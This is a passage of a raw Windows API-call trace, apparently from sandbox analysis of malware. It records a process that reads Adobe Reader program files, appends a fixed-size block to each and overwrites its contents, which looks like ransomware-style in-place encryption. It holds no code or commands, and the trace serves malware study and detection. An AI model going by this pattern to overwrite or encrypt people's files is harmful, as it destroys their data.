[0088.696] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xa00 [0088.696] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.696] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.696] ReleaseMutex (hMutex=0x168) returned 1 [0088.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.TUR", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0088.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Flash.TUR", cchWideChar=9, lpMultiByteStr=0x1f7352c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Flash.TUR", lpUsedDefaultChar=0x0) returned 9 [0088.697] ReadFile (in: hFile=0x1fc, lpBuffer=0x1eace08, nNumberOfBytesToRead=0xa00, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesRead=0x2e9f2bc*=0xa00, lpOverlapped=0x0) returned 1 [0088.761] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0088.761] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0xf88, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2e9f2d0*=0xf88, lpOverlapped=0x0) returned 1 [0088.761] CloseHandle (hObject=0x1fc) returned 1 [0088.816] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0088.817] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.817] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x174c63 [0088.818] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0088.818] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0088.818] ReleaseMutex (hMutex=0x168) returned 1 [0088.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.api", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0088.818] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.api", cchWideChar=14, lpMultiByteStr=0x1f735cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.api", lpUsedDefaultChar=0x0) returned 14 [0088.818] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0088.933] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.012] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x173c63 [0089.013] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.023] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x173c63 [0089.024] WriteFile (in: hFile=0x1ec, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0089.024] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0089.024] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0089.025] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0089.025] CloseHandle (hObject=0x1ec) returned 1 [0089.025] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Spelling.api" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\spelling.api"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0089.026] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0089.026] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x43a63 [0089.026] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0089.026] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.026] ReleaseMutex (hMutex=0x168) returned 1 [0089.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.api", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.026] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Spelling.api", cchWideChar=12, lpMultiByteStr=0x1f7340c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Spelling.api", lpUsedDefaultChar=0x0) returned 12 [0089.026] ReadFile (in: hFile=0x1ec, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0089.078] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x42a63 [0089.078] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.090] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x42a63 [0089.090] WriteFile (in: hFile=0x1ec, lpBuffer=0x288ce18*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288ce18*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0089.090] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0089.090] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0089.091] CloseHandle (hObject=0x1ec) returned 1 [0089.091] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins3d\\prc\\MyriadCAD.otf" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins3d\\prc\\myriadcad.otf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0089.091] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0089.091] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x131c4 [0089.091] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0089.092] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.092] ReleaseMutex (hMutex=0x168) returned 1 [0089.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadCAD.otf", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.092] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MyriadCAD.otf", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MyriadCAD.otf", lpUsedDefaultChar=0x0) returned 13 [0089.092] ReadFile (in: hFile=0x1ec, lpBuffer=0x288ade8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288ade8*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0089.093] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x121c4 [0089.093] ReadFile (in: hFile=0x1ec, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.094] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x121c4 [0089.094] WriteFile (in: hFile=0x1ec, lpBuffer=0x2666398*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2666398*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0089.094] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0089.094] WriteFile (in: hFile=0x1ec, lpBuffer=0x2863a28*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0089.094] CloseHandle (hObject=0x1ec) returned 1 [0089.094] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\SPPlugins\\ADMPlugin.apl" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\spplugins\\admplugin.apl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0089.095] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0089.095] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x154e00 [0089.095] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0089.095] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0089.095] ReleaseMutex (hMutex=0x168) returned 1 [0089.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADMPlugin.apl", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0089.095] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ADMPlugin.apl", cchWideChar=13, lpMultiByteStr=0x1f7340c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ADMPlugin.apl", lpUsedDefaultChar=0x0) returned 13 [0089.095] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0xf000, lpOverlapped=0x0) returned 1 [0089.178] ReadFile (in: hFile=0x1ec, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0089.269] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x153e00 [0089.269] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0090.015] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x153e00 [0090.015] WriteFile (in: hFile=0x1ec, lpBuffer=0x2867a88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867a88*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0090.016] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0090.016] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0xf000, lpOverlapped=0x0) returned 1 [0090.016] WriteFile (in: hFile=0x1ec, lpBuffer=0x25a0018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0090.016] CloseHandle (hObject=0x1ec) returned 1 [0090.016] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\ended_review_or_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\ended_review_or_form.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0090.017] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.017] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x327 [0090.017] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.017] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.017] ReleaseMutex (hMutex=0x168) returned 1 [0090.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ended_review_or_form.gif", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0090.017] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ended_review_or_form.gif", cchWideChar=24, lpMultiByteStr=0x1f8fcfc, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ended_review_or_form.gif", lpUsedDefaultChar=0x0) returned 24 [0090.017] ReadFile (in: hFile=0x1ec, lpBuffer=0x288ae08, nNumberOfBytesToRead=0x327, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x288ae08*, lpNumberOfBytesRead=0x2e9f2bc*=0x327, lpOverlapped=0x0) returned 1 [0090.613] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0090.613] WriteFile (in: hFile=0x1ec, lpBuffer=0x2882dd8*, nNumberOfBytesToWrite=0x8af, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2882dd8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x8af, lpOverlapped=0x0) returned 1 [0090.613] CloseHandle (hObject=0x1ec) returned 1 [0090.613] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\open_original_form.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\open_original_form.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0090.614] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.614] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x326 [0090.614] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.614] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.614] ReleaseMutex (hMutex=0x168) returned 1 [0090.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="open_original_form.gif", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0090.614] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="open_original_form.gif", cchWideChar=22, lpMultiByteStr=0x1f88a64, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="open_original_form.gif", lpUsedDefaultChar=0x0) returned 22 [0090.614] ReadFile (in: hFile=0x1ec, lpBuffer=0x2691bd8, nNumberOfBytesToRead=0x326, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2691bd8*, lpNumberOfBytesRead=0x2e9f2bc*=0x326, lpOverlapped=0x0) returned 1 [0090.742] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0090.743] WriteFile (in: hFile=0x1ec, lpBuffer=0x286cf78*, nNumberOfBytesToWrite=0x8ae, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesWritten=0x2e9f2d0*=0x8ae, lpOverlapped=0x0) returned 1 [0090.743] CloseHandle (hObject=0x1ec) returned 1 [0090.743] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\review_same_reviewers.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\review_same_reviewers.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0090.744] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.744] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x3c2 [0090.744] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.744] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.744] ReleaseMutex (hMutex=0x168) returned 1 [0090.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_same_reviewers.gif", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0090.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="review_same_reviewers.gif", cchWideChar=25, lpMultiByteStr=0x1f8fd5c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="review_same_reviewers.gif", lpUsedDefaultChar=0x0) returned 25 [0090.744] ReadFile (in: hFile=0x1ec, lpBuffer=0x1e99938, nNumberOfBytesToRead=0x3c2, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1e99938*, lpNumberOfBytesRead=0x2e9f2bc*=0x3c2, lpOverlapped=0x0) returned 1 [0090.804] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0090.804] WriteFile (in: hFile=0x1ec, lpBuffer=0x1eace08*, nNumberOfBytesToWrite=0x94a, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eace08*, lpNumberOfBytesWritten=0x2e9f2d0*=0x94a, lpOverlapped=0x0) returned 1 [0090.805] CloseHandle (hObject=0x1ec) returned 1 [0090.805] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Tracker\\tl.gif" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\tracker\\tl.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1ec [0090.806] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.806] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x55 [0090.806] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0090.806] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0090.806] ReleaseMutex (hMutex=0x168) returned 1 [0090.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tl.gif", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0090.806] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tl.gif", cchWideChar=6, lpMultiByteStr=0x1f7ac0c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tl.gif", lpUsedDefaultChar=0x0) returned 6 [0090.806] ReadFile (in: hFile=0x1ec, lpBuffer=0x1fbb118, nNumberOfBytesToRead=0x55, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1fbb118*, lpNumberOfBytesRead=0x2e9f2bc*=0x55, lpOverlapped=0x0) returned 1 [0090.807] SetFilePointer (in: hFile=0x1ec, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: 